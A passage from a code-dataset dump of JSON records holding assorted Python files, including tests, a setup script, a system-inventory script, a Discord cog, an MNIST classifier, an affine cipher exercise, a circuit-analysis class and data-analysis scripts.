add_save_option=True,\n key=self.get_page_key(\"pipeline_output_preview\"),\n container=st,\n 
)\n","repo_name":"frkl-io/kiara.streamlit","sub_path":"src/kiara_streamlit/pipelines/pages/stage.py","file_name":"stage.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10508529827","text":"import pytest\nimport yaml\n\nfrom dataClasses.load import recipesFromConfig\nfrom graphClasses.graph import Graph\n\nimport json\ndef loadTestConfig():\n with open('config_factory_graph.yaml', 'r') as f:\n graph_config = yaml.safe_load(f)\n return graph_config\n\n# Note that recipe ordering is deterministic!\n# (Thanks to the OrderedDict hook in dataClasses.load.recipesFromConfig)\n\n\ndef test_connectionSimple():\n project_name = 'simpleGraph'\n\n # Load recipes\n recipes = recipesFromConfig(project_name, project_folder='tests/testProjects')\n\n # Create graph\n g = Graph(project_name, recipes, loadTestConfig())\n g.connectGraph()\n\n ### Check connections\n # 0: electrolyzer\n # 1: extractor\n\n expected_edges = [\n ('source', '1', 'sugar beet'),\n ('1', '0', 'sugar'),\n ('0', 'sink', 'carbon dust'),\n ('0', 'sink', 'oxygen'),\n ('0', 'sink', 'water'),\n ]\n\n assert set(expected_edges) == set(g.edges.keys())\n\n\ndef test_connectionLoop():\n project_name = 'loopGraph'\n\n # Load recipes\n recipes = recipesFromConfig(project_name, project_folder='tests/testProjects')\n\n # Create graph\n g = Graph(project_name, recipes, loadTestConfig())\n g.connectGraph()\n g.removeBackEdges()\n\n ### Check connections\n # 0: distillation tower\n # 1: large chemical reactor\n\n expected_edges = [\n ('source', '1', 'acetic acid'),\n ('source', '1', 'sulfuric acid'),\n ('1', '0', 'diluted sulfuric acid'),\n ('1', 'sink', 'ethenone'),\n ('0', 'sink', 'sulfuric acid'),\n ('0', 'sink', 'water'),\n ]\n\n assert set(expected_edges) == set(g.edges.keys())\n","repo_name":"Eldrinn-Elantey/gtnh-flow","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"5624431264","text":"import pathlib\nfrom pytz import VERSION\nfrom setuptools import find_packages, setup\n\nHERE = pathlib.Path(__file__).parent\n\nVERSION = '0.0.2b' #\nPACKAGE_NAME = 'ProbabilityLib' #Ojo es el nombre de la libreria y de la carpeta\nAUTHOR = 'L Felipe Guerrero'\nAUTHOR_EMAIL = 'felipe.guerrero@correounivalle.edu.co' \nURL = '' \n\nLICENSE = 'MIT' #Tipo de licencia\nDESCRIPTION = 'Librería para leer ficheros PDFs y extraer la información en formato str' #Descripción corta\nLONG_DESCRIPTION = (HERE / \"README.md\").read_text(encoding='utf-8') #Referencia al documento README con una descripción más elaborada\nLONG_DESC_TYPE = \"text/markdown\"\n\n\n#Paquetes necesarios para que funcione la libreía. Se instalarán a la vez si no lo tuvieras ya instalado\nINSTALL_REQUIRES = [\n 'pandas',\n 'matplotlib',\n 'pymc3',\n 'numpy',\n 'seaborn',\n 'scipy',\n ]\nsetup(\n name=PACKAGE_NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n long_description_content_type=LONG_DESC_TYPE,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n url=URL,\n install_requires=INSTALL_REQUIRES,\n license=LICENSE,\n packages=find_packages(),\n include_package_data=True\n)","repo_name":"LFGuerreroM/Probability","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10790256150","text":"import subprocess\nimport os\nimport json\n\n#get hostname info\ncmd = subprocess.Popen(['hostname'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n(output, err) = cmd.communicate()\nhostname=(output.decode().strip())\n\n#get cpu info\ncpuinfo = os.popen(\"cat /proc/cpuinfo | grep 'model name' | uniq | awk -F ':' '{print $2}' | sed 's/^ *//'\")\ncpuinfo = cpuinfo.read()\ncpuinfo = cpuinfo.strip()\n\n#get disks info\ndiskinfo = os.popen(\"df -h | grep -v 'tmpfs\\|boot\\|Filesystem' | awk -F ' ' '{ print $6\\\" \\\"$2\\\" \\\"}' | tr -d '\\n'\")\ndiskinfo = diskinfo.read()\ndiskinfo = diskinfo.strip()\n\n#get mem info\nmeminfo = os.popen(\"free -m | grep '^Mem' | awk -F ' ' '{ print $2 }'\")\nmeminfo = meminfo.read()\nmeminfo = meminfo.strip()\nmeminfo = round(float(meminfo)/1024)\n#meminfo = float(meminfo)\n\n#get os info\nosinfo = os.popen(\"uname\")\nosinfo = osinfo.read()\nosinfo = osinfo.strip()\n\n#get os kernel / version info\noskinfo = os.popen(\"uname -r\")\noskinfo = oskinfo.read()\noskinfo = oskinfo.strip()\n\n#get ip addr v4\nipv4info = os.popen(\"ip addr | grep -w inet | awk -F ' ' '{ print $2\\\" \\\" }' | grep -Ev '^127.0|::1/128' | awk -F '/' '{ print $1\\\" \\\" }' | tr -d '\\n'\")\nipv4info = ipv4info.read()\nipv4info = ipv4info.strip()\n\n#get ip addr v6\nipv6info = os.popen(\"ip addr | grep -w inet6 | awk -F ' ' '{ print $2\\\" \\\" }' | grep -Ev '^127.0|::1/128' | awk -F '/' '{ print $1\\\" \\\" }' | tr -d '\\n'\")\nipv6info = ipv6info.read()\nipv6info = ipv6info.strip()\n\n#get hardware info\n\n#serial number\nserialnmbr = os.popen(\"sudo dmidecode -s system-serial-number\")\nserialnmbr = serialnmbr.read()\nserialnmbr = serialnmbr.strip()\n\n#product manufacturer\nprodman = os.popen(\"sudo dmidecode -s system-manufacturer\")\nprodman = prodman.read()\nprodman = prodman.strip()\n\n#Product Name\nprodname = os.popen(\"sudo dmidecode -s system-product-name\")\nprodname = prodname.read()\nprodname = prodname.strip()\n\n\n#print(hostname+\" \"+cpuinfo+\" \"+str(meminfo)+\" \"+diskinfo+\" \"+osinfo+\" \"+oskinfo+\" \"+ipv4info+\" \"+ipv6info)\n\nprint(\"Hostname: \"+hostname)\nprint(\"CPU: \"+cpuinfo)\nprint(\"Memory: \"+str(meminfo))\nprint(\"Disks: \"+diskinfo)\nprint(\"OS: \"+osinfo)\nprint(\"Kernel / Version: \"+oskinfo)\nprint(\"IP v4 Addr: \"+ipv4info)\nprint(\"IP v6 Addr: \"+ipv6info)\nprint(\"Hardware info\")\nprint(\"Serial number: \"+serialnmbr)\nprint(\"Product manufacturer: \"+prodman)\nprint(\"Product name: \"+prodname)\n\ninv = {}\n\ninv = {\n 'hostname': hostname,\n 'cpu': cpuinfo,\n 'memory': meminfo,\n 'disks': diskinfo,\n 'os': osinfo,\n 'krnl': oskinfo,\n 'ipv4': ipv4info,\n 'ipv6': ipv6info,\n 'psn': serialnmbr,\n 'pmanufacturer': prodman,\n 'pname': prodname\n}\n\nwith open('story.json', 'w') as outfile:\n json.dump(inv, outfile)\n","repo_name":"storyteller-lab/story-teller","sub_path":"get_the_story.py","file_name":"get_the_story.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30981164875","text":"import discord\r\nfrom discord.ext import commands\r\n\r\n\r\n\r\n# \"\"\"music commands for Plaryboat\r\n# credits to Lucas Kumara for all heads up\"\"\"\r\n\r\nclass Music:\r\n def __init__(self, bot): #self and the bot variable\r\n self.bot = bot\r\n\r\n async def on_message_delete(self,message):\r\n print('message deleted')\r\n\r\n\r\n @commands.command()\r\n async def oof(self):\r\n await self.bot.say('pong')\r\n\r\ndef setup(bot):\r\n bot.add_cog(Music(bot))\r\n","repo_name":"Plaryy/plarybot","sub_path":"cogs/Music.py","file_name":"Music.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12755419506","text":"from django.core.management.base import BaseCommand, CommandError\nfrom recosys.models import User\n\n# -*- coding: utf_8 -*-\nfrom itertools import islice\n\n\nclass Command(BaseCommand):\n args = \"\"\n help = \"Add Users from a text file\"\n\n def handle(self, *args, **options):\n if len(args) == 0:\n raise CommandError('No input file given')\n user_list = args[0]\n n = 10000\n counter = 0\n with open(user_list) as f:\n while True:\n next_n_lines = list(islice(f,n))\n if not next_n_lines:\n break\n for line in next_n_lines:\n all_iterms = line.split()\n index = all_iterms[0]\n if len(all_iterms) > 1:\n name = all_iterms[1]\n else:\n name = \"user\"+str(counter)\n q = User.objects.create_user(index, name)\n q.save()\n counter += 1\n self.stdout.write('Successfully added %d Users' % counter)\n","repo_name":"juxj/recommend_movie_site","sub_path":"recosys/management/commands/read_users.py","file_name":"read_users.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6661501576","text":"import pandas as pd\nimport numpy as np\n\ndef sum_of_ects(courses_df):\n sum_ects = courses_df['ECTS'].sum()\n return sum_ects\n\ndef sum_of_sst(courses_df):\n sum_sst = courses_df['SSt.'].sum()\n return sum_sst\n \nif __name__ == \"__main__\": \n ects_df = pd.read_csv('ects.csv')\n print(ects_df)\n\n # print sum of ects\n sum_ects = sum_of_ects(ects_df)\n print(f'You have {sum_ects:.0f} ECTS in total.')\n\n # print ects of semesters\n # fehlt\n\n # print sum of SSt. \n sum_sst = sum_of_sst(ects_df)\n print(f'You have {sum_sst:.0f} semester hours in total.')\n\n # print spacer\n print('-')\n\n # print average of ects\n number_of_rows = ects_df.shape[0]-1\n print(f'The number of classes, in which {sum_ects:.0f} ects have been acquired, is {number_of_rows:.0f}.')\n average_ects = sum_ects/number_of_rows\n print(f'On average you have acquired {average_ects:.2f} ects per class.')\n \n\n\n ","repo_name":"matthiaseigner/devcamp","sub_path":"python/lesson_1/e_07_main.py","file_name":"e_07_main.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38311597798","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor, Resize, Compose\nimport numpy as np\nimport random\n\n# Set the random seed for PyTorch\nseed = 42\ntorch.manual_seed(seed)\n\n# Set the random seed for CUDA (if available)\nif torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n# Set the random seed for Python's built-in random module\nrandom.seed(seed)\n\n# Set the random seed for NumPy\nnp.random.seed(seed)\n\n# Enable deterministic behavior in CuDNN (if available)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nsize = (14,14)\n\ntransform = Compose([Resize(size), ToTensor()])\n\n# Download training data from open datasets.\ntraining_data = datasets.MNIST(\n root=\"data\",\n train=True,\n download=True,\n transform=transform,\n)\n\n# Download test data from open datasets.\ntest_data = datasets.MNIST(\n root=\"data\",\n train=False,\n download=True,\n transform=transform,\n)\n\nbatch_size = 64\n\n# Create data loaders.\ntrain_dataloader = DataLoader(training_data, batch_size=batch_size)\ntest_dataloader = DataLoader(test_data, batch_size=batch_size)\n\nfor X, y in test_dataloader:\n print(f\"Shape of X [N, C, H, W]: {X.shape}\")\n print(f\"Shape of y: {y.shape} {y.dtype}\")\n break\n\n\n# Get cpu, gpu or mps device for training.\ndevice = (\n \"cuda\"\n if torch.cuda.is_available()\n else \"mps\"\n if torch.backends.mps.is_available()\n else \"cpu\"\n)\nprint(f\"Using {device} device\")\n\n\nclass Classifier(torch.nn.Module):\n def __init__(self, **kwargs):\n super(Classifier, self).__init__()\n self.neurons = size[0] * size[1]\n self.fc1 = torch.nn.Linear(self.neurons, 16)\n self.fc2 = torch.nn.Linear(16, 10)\n\n def forward(self, x):\n x = self.fc1(x.view(-1, self.neurons))\n x = torch.relu(x)\n x = self.fc2(x)\n return x\n\n\nmodel = Classifier().to(device)\nprint(model)\n\n\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n\ndef train(dataloader, model, loss_fn, optimizer):\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n\n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 100 == 0:\n loss, current = loss.item(), (batch + 1) * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\ndef test(dataloader, model, loss_fn):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss, correct = 0, 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\n test_loss /= num_batches\n correct /= size\n print(\n f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\"\n )\n\n\nepochs = 5\nfor t in range(epochs):\n print(f\"Epoch {t+1}\\n-------------------------------\")\n train(train_dataloader, model, loss_fn, optimizer)\n test(test_dataloader, model, loss_fn)\nprint(\"Done!\")\n\n\ntorch.save(model.state_dict(), \"./model.pth\")\nprint(\"Saved PyTorch Model State to 
model.pth\")\n","repo_name":"berendjan/zk-neural-network","sub_path":"python/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"27464449919","text":"import asyncio\nimport time\nfrom asyncio import Future\n\n\nasync def world():\n await asyncio.sleep(4)\n print(\"world\")\n return \"world\"\n\n\ndef hello():\n print(\"hello\")\n t = asyncio.create_task(world())\n while not t.done():\n continue\n print(t.result())\n print(\"world completed\")\n\n\nasync def do_exit():\n print(\"do exit....\")\n await asyncio.sleep(4)\n\n\nasync def main():\n print(\"main\")\n hello()\n await do_exit()\n\nasyncio.run(main())\n","repo_name":"onsunsl/onsunsl.github.io","sub_path":"note/demo/async/sync_call_async.py","file_name":"sync_call_async.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72206971099","text":"#-------------------------------------------------------------------------\n# 程序:users_behavior\n# 日期:2018.4.12\n# 功能:获取特定行为的数据\n#-------------------------------------------------------------------------\nimport sys\nimport os\n\nPACKAGE_PARENT = '..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom pymongo import MongoClient\nimport time, datetime\nimport pandas, numpy\nimport os, csv, re\nimport matplotlib.pyplot as plt\nfrom sparrow.tools import get_datetime, get_timestamp, write_csv\n\nsource_data_path = 'D:/sparrow_data/'\nfile_save_path = 'D:/sparrow_data/main_analysis/'\n\nclass Mongo:\n def __init__(self):\n self.client = MongoClient('localhost', 27017)\n self.db = self.client.sparrow_main\n self.all_users = self.db.users\n self.users_login_log = self.db.login_log\n self.apple_pay = self.db.apple_iap_log\n self.daily_data = self.db.daily_deal_data\n self.third_pay = self.db.recharge_orders\n self.daily_task_log = self.db.daily_task_log\n\n self.db2 = self.client.sparrow_analysis\n\nclass UserPayAnalysis:\n def __init__(self, off_day, pic_name, csv_name):\n self.pic_name = pic_name\n self.csv_name = csv_name\n self.off_day = off_day\n self.time_today = time.time()\n self.st_year, self.st_month, self.st_day = int(\n time.strftime('%Y', time.localtime(self.time_today - 86400 * (self.off_day + 2)))), int(\n time.strftime('%m', time.localtime(self.time_today - 86400 * (self.off_day + 2)))), int(\n time.strftime('%d', time.localtime(self.time_today - 86400 * (self.off_day + 2))))\n self.end_year, self.end_month, self.end_day = int(\n time.strftime('%Y', time.localtime(self.time_today - 86400 * (self.off_day + 1)))), int(\n time.strftime('%m', time.localtime(self.time_today - 86400 * (self.off_day + 1)))), int(\n time.strftime('%d', time.localtime(self.time_today - 86400 * (self.off_day + 1))))\n # 用户付费行为分析\n def user_pay_data(self):\n csv_head = ['user_id', 'user_regist_date', '当日付费', '3天付费', '7天付费', '14天付费']\n # users = mongo.all_users.find({'username':{'$regex':r'^(?!robot_[0-9]{5})'}})\n users = mongo.all_users.find({'regist_date':{\"$gte\":datetime.datetime(self.st_year, self.st_month, self.st_day, 0, 0)}})\n data = []\n for user in users:\n save_data = {}\n save_data['user_id'] = str(user['_id'])\n save_data['user_regist_date'] = user['regist_date']\n # 注册后一定日期内付费\n query_list = [[0, 1], [1, 3], [3, 7], [7, 14]]\n for query_days in query_list:\n st_date_timestamp = get_timestamp(save_data['user_regist_date'].year,\n save_data['user_regist_date'].month,\n save_data['user_regist_date'].day,\n save_data['user_regist_date'].hour)\n st_date = get_datetime(st_date_timestamp, -query_days[0])\n end_date = get_datetime(st_date_timestamp, -query_days[1])\n pay_data = self.get_user_pay_log({'user_id': save_data['user_id']}, st_date=st_date, end_date=end_date)\n save_data[csv_head[query_list.index(query_days)+2]] = [[pay_data['third_pay_count'] + pay_data['apple_pay_count']],\n [pay_data['third_pay_amount'] + pay_data['apple_pay_amount']]]\n data.append(save_data)\n #写入文件\n file_path = file_save_path + '{}.csv'.format(self.csv_name)\n write_csv(file_path, head=csv_head, keys=csv_head, data=data)\n\n # 获取某个id的支付\n def get_user_pay_log(self, user_id:dict, st_date, end_date):\n print(user_id)\n pay_data = {}\n third_pay_log = mongo.third_pay.aggregate(\n [\n 
{'$match':{'pay_date':{\"$gte\":datetime.datetime(st_date[0],st_date[1],st_date[2],0,0),\n '$lte':datetime.datetime(end_date[0],end_date[1],end_date[2],0,0)},\n 'paid':True, 'source':user_id['user_id']}},\n {'$group':{'_id':'', 'pay_count':{'$sum':1}, 'pay_amount':{'$sum':'$price'}}}\n ]\n )\n try:\n third_pay_log_list = list(third_pay_log)[0]\n pay_data['third_pay_count'] = third_pay_log_list['pay_count']\n pay_data['third_pay_amount'] = third_pay_log_list['pay_amount']\n except:\n pay_data['third_pay_count'], pay_data['third_pay_amount'] = 0, 0\n\n\n apple_pay_log = mongo.apple_pay.aggregate(\n [\n {'$match': {'date': {\"$gte\": datetime.datetime(st_date[0], st_date[1], st_date[2], 0, 0),\n '$lte': datetime.datetime(end_date[0], end_date[1], end_date[2], 0, 0)},\n 'source':user_id['user_id']}},\n {'$group': {'_id': '', 'pay_count': {'$sum': 1}, 'pay_amount': {'$sum': '$price'}}}\n ]\n )\n try:\n apple_pay_log_list = list(apple_pay_log)[0]\n pay_data['apple_pay_count'] = apple_pay_log_list['pay_count']\n pay_data['apple_pay_amount'] = apple_pay_log_list['pay_amount']\n except:\n pay_data['apple_pay_count'], pay_data['apple_pay_amount'] = 0, 0\n print(pay_data)\n return pay_data\n\n def user_pay_analysis(self):\n csv_head = ['user_id', 'user_regist_date', '当日付费', '3天付费', '7天付费', '14天付费']\n data = pandas.read_csv(file_save_path + '{}.csv'.format(self.csv_name))\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n pay_user_count, pay_amount = [0]*4, [0]*4\n for row in range(0, data.shape[0]):\n for head in csv_head[2:]:\n if int(re.findall(r'\\[\\[(.*)\\], \\[(.*)\\]\\]', data.ix[row, head])[0][0]) > 0:\n pay_user_count[csv_head.index(head)-2] += 1\n pay_amount[csv_head.index(head)-2] += round(float(re.findall(r'\\[\\[(.*)\\], \\[(.*)\\]\\]', data.ix[row, head])[0][1]))\n pay_proportion = numpy.array(pay_user_count) / data.shape[0]\n pay_average = numpy.array(pay_amount) / numpy.array(pay_user_count) / 100\n ax1.bar(numpy.arange(len(pay_proportion)), pay_proportion, tick_label=csv_head[2:], width=0.2, color='blueviolet')\n ax1.set_ylabel('付费率')\n ax11 = ax1.twinx()\n ax11.plot(numpy.arange(len(pay_proportion)), pay_average, color='plum')\n ax11.set_ylabel('平均付费金额')\n for i in range(0, len(pay_proportion)):\n try:\n ax11.text(i, pay_average[i], int(pay_average[i]))\n except:\n ax11.text(i, pay_average[i], 0)\n ax1.text(i-0.05 ,pay_proportion[i]+0.001, '%.2f%%' %(pay_proportion[i]*100))\n pic_path = file_save_path+'{}.jpg'.format(self.pic_name)\n plt.savefig(pic_path)\n plt.show()\n\n def get_datetime_list(self, iso_datetime):\n return [iso_datetime.year, iso_datetime.month, iso_datetime.day, iso_datetime.hour]\n\n\n\nif __name__ == '__main__':\n mongo = Mongo()\n behaviors_analysis = UserPayAnalysis(off_day=15, pic_name='30', csv_name='30天支付')\n start_time = time.time()\n behaviors_analysis.user_pay_data()\n behaviors_analysis.user_pay_analysis()\n print(time.time()-start_time)","repo_name":"meijida258/mediaSpider","sub_path":"DA/sparrow/users_behavior.py","file_name":"users_behavior.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42281448745","text":"from .netlist import Netlist\nfrom .netfile import NetfileMixin\n\n\n__all__ = ('Circuit', )\n\n\nclass Circuit(Netlist, NetfileMixin):\n\n \"\"\"The Circuit class is used for describing networks using\n netlists. Despite the name, it does not require a closed path.\n\n Here's an example of using the Circuit class:\n\n cct = Circuit('''\n V1 1 0 V; down\n R1 1 2 R; right\n C1 2 0_2 C; down\n W 0 0_2; right''')\n\n The directions after the semicolon are hints for drawing the\n schematic and are ignored for the circuit analysis. The last net\n is a wire to make the schematic look nice; it is not needed for\n circuit analysis. Indeed the capacitor could be connected\n directly to nodes 2 and 0.\n\n The nodes are usually numbers but can be any alphanumeric name\n including underscores. By default, nodes with underscores are not\n drawn.\n\n The circuit components are also usually numbered but again they\n can be any alphanumeric name. They can also have anonymous names,\n as for the wire in the example. Internally they are enumerated\n sequentially for each component type: W#1, W#2, etc.\n\n The circuit can be displayed using:\n >>> cct.draw()\n\n The schematic can be saved to a file using:\n >>> cct.draw('schematic.pdf')\n\n The transform domain voltages across a component can be found using:\n >>> cct.V1.V\n\n This is found using modified nodal analysis for each type of\n independent source in the circuit (AC, DC, transient, noise).\n Once this is performed, the results are cached until the network\n is modified.\n\n The transform domain currents through a component can be found using:\n >>> cct.R1.I\n\n The transform domain nodal voltages with respect to the ground node (0)\n can be found using:\n cct[2].V\n\n The time domain voltages and currents are displayed using\n lowercase attributes v and i. For example,\n >>> cct.C1.v. This is equivalent to >>> cct.C1.V(t).\n\n The impedance between nodes 2 and 0 can be found using:\n >>> Z = cct.impedance(2, 0)\n\n The open-circuit voltage between nodes 2 and 0 can be found using:\n >>> Z = cct.Voc(2, 0)\n\n The Thevenin equivalent circuit between nodes 2 and 0 can be found\n using:\n >>> thevenin = cct.Thevenin(2, 0)\n\n The s-domain model can be drawn using:\n >>> cct.s_model().draw()\n\n \"\"\"\n\n def __init__(self, filename=None, netlist=None, allow_anon=False, context=None):\n\n # Treat filename as netlist if it has a newline.\n if filename is not None and '\\n' in filename:\n super(Circuit, self).__init__(allow_anon=allow_anon,\n context=context)\n self.add(filename)\n else:\n super(Circuit, self).__init__(filename, allow_anon=allow_anon,\n context=context)\n\n if netlist is not None:\n self.add(netlist)\n","repo_name":"mph-/lcapy","sub_path":"lcapy/circuit.py","file_name":"circuit.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"69"}
+{"seq_id":"2275763360","text":"# function to find the index of a character\r\ndef indexOf(alphabet):\r\n return ord(alphabet) - 65\r\n\r\n\r\n# function to get character from an index\r\ndef getAlphabet(index):\r\n return chr(index + 65)\r\n\r\n\r\n# function to find multiplicative inverse using Extended Euclidean Algorithm\r\n# return modular multiplicative inverse of ‘x’ under modulo ‘y’\r\n# (x*k) mod y = 1 , where k is the modular multiplicative inverse of ‘x’ under modulo ‘y’\r\ndef findMultiplicativeInverse(x, y):\r\n r1 = y # larger number\r\n r2 = x # smaller number\r\n t1 = 0\r\n t2 = 1\r\n # print('q', 'r1', 'r2', 'r', 't1', 't2', 't')\r\n while r2 != 0:\r\n q = r1 // r2\r\n r = r1 % r2\r\n t = t1 - q * t2\r\n\r\n # print(q, r1, r2, r, t1, t2, t)\r\n r1 = r2\r\n r2 = r\r\n\r\n t1 = t2\r\n t2 = t\r\n if r1 == 1: # ensuring gcd is 1 for multiplicative inverse to exist\r\n return t1\r\n else:\r\n return False\r\n\r\n\r\n# function to encrypt using affine cipher\r\n# key1 -> multiplicative key\r\n# key2 -> additive key\r\n# key1 and key2 needs to be different\r\ndef encryptAffineCipher(plaintext_1, key1, key2):\r\n encryptedText = \"\"\r\n plaintext=plaintext_1.upper()\r\n for alphabet in plaintext:\r\n index = indexOf(alphabet)\r\n index = (index * key1) % 26 # key1 and 26 needs to be co-prime\r\n index = (index + key2) % 26\r\n encryptedText += getAlphabet(index)\r\n return encryptedText\r\n\r\n\r\n# function to decrypt using affine cipher\r\n# key1 -> multiplicative key\r\n# # key2 -> additive key\r\n# # key1 and key2 needs to be different\r\ndef decryptAffineCipher(encryptedText_1, key1, key2):\r\n decryptedText = \"\"\r\n encryptedText=encryptedText_1.upper()\r\n for alphabet in encryptedText:\r\n index = indexOf(alphabet)\r\n # key2 operations\r\n index = index - key2\r\n if index < 0:\r\n index += 26\r\n index %= 26\r\n # key1 operations\r\n key1MultiplicativeInverse = findMultiplicativeInverse(key1, 26)\r\n index = index * key1MultiplicativeInverse\r\n index %= 26\r\n\r\n decryptedText += getAlphabet(index)\r\n return decryptedText\r\n\r\n#Sample Input & Output.\r\nprint(\"*****ENCRYPTION******\")\r\nprint(\"SAMPLE INPUT ::\")\r\nprint(\"Plain text : HELLO\")\r\nprint(\"SAMPLE OUTPUT :: \")\r\nprint(encryptAffineCipher(\"HELLO\", 7, 2))\r\nprint()\r\nprint(\"*****DECRYPTION******\")\r\nprint(\"SAMPLE INPUT ::\")\r\nprint(\"Plain text : ZWBBW\")\r\nprint(\"SAMPLE OUTPUT :: \")\r\nprint(decryptAffineCipher(\"ZEBBW\", 7, 2))\r\nprint()\r\n\r\n#user input\r\nprint(\"*****ENCRYPTION******\")\r\nuser_input=input(\"Enter text for encrypting : \")\r\nmultiplicative_key=int(input(\"Enter the multiplicative key : \"))\r\nadditive_key=int(input(\"Enter the additive key : \"))\r\nprint(\"Your input :: \")\r\nprint(\"Plain text : \"+user_input)\r\nprint(\"Multiplicative Key : \"+str(multiplicative_key))\r\nprint(\"Additive Key : \"+str(additive_key))\r\nprint(\"Your Output ::\")\r\nprint(\"Encrypted : \", end=\" \")\r\nprint(encryptAffineCipher(user_input, multiplicative_key, additive_key))\r\n\r\nprint()\r\n\r\nprint(\"*****DECRYPTION******\")\r\nuser_input=input(\"Enter text for decrypting : \")\r\nmultiplicative_key=int(input(\"Enter the multiplicative key : \"))\r\nadditive_key=int(input(\"Enter the additive key : \"))\r\nprint(\"Your input :: \")\r\nprint(\"Plain text : \"+user_input)\r\nprint(\"Multiplicative Key : \"+str(multiplicative_key))\r\nprint(\"Additive Key : \"+str(additive_key))\r\nprint(\"Your Output ::\")\r\n\r\nprint(\"Decrypted : \", end=\" 
\")\r\nprint(decryptAffineCipher(user_input, multiplicative_key, additive_key))\r\nprint()","repo_name":"hemantsingh205/ASSIGNMENT_INFORMATION_SECURITY","sub_path":"Q2_Affine_Cipher.py","file_name":"Q2_Affine_Cipher.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38102990989","text":"from safe.impact_functions.core import FunctionProvider\nfrom safe.impact_functions.core import get_hazard_layer, get_exposure_layer\nfrom safe.storage.vector import Vector\nfrom safe.engine.interpolation import assign_hazard_values_to_exposure_data\n\n\nclass EarthquakeBuildingDamageFunction(FunctionProvider):\n \"\"\"Risk plugin for earthquake damage to buildings\n\n :param requires category=='hazard' and \\\n subcategory.startswith('earthquake') and \\\n layertype=='raster'\n :param requires category=='exposure' and \\\n subcategory=='structure'\n \"\"\"\n\n plugin_name = 'Earthquake Building Damage Function'\n\n @staticmethod\n def run(layers):\n \"\"\"Risk plugin for earthquake school damage\n \"\"\"\n\n # Extract data\n H = get_hazard_layer(layers) # Ground shaking\n E = get_exposure_layer(layers) # Building locations\n\n # Interpolate hazard level to building locations\n H = assign_hazard_values_to_exposure_data(H, E,\n attribute_name='MMI')\n\n # Extract relevant numerical data\n coordinates = E.get_geometry()\n shaking = H.get_data()\n\n # Calculate building damage\n building_damage = []\n for i in range(len(shaking)):\n x = float(shaking[i]['MMI'])\n if x < 6.0 or (x != x): # x != x -> check for nan pre python 2.6\n value = 0.0\n else:\n value = (0.692 * (x ** 4) -\n 15.82 * (x ** 3) +\n 135.0 * (x ** 2) -\n 509.0 * x + 714.4)\n\n building_damage.append({'DAMAGE': value, 'MMI': x})\n\n # Create new layer and return\n V = Vector(data=building_damage,\n projection=E.get_projection(),\n geometry=coordinates)\n return V\n","repo_name":"D2KG/FLOOgin","sub_path":"safe/engine/impact_functions_for_testing/unspecific_building_impact_model.py","file_name":"unspecific_building_impact_model.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
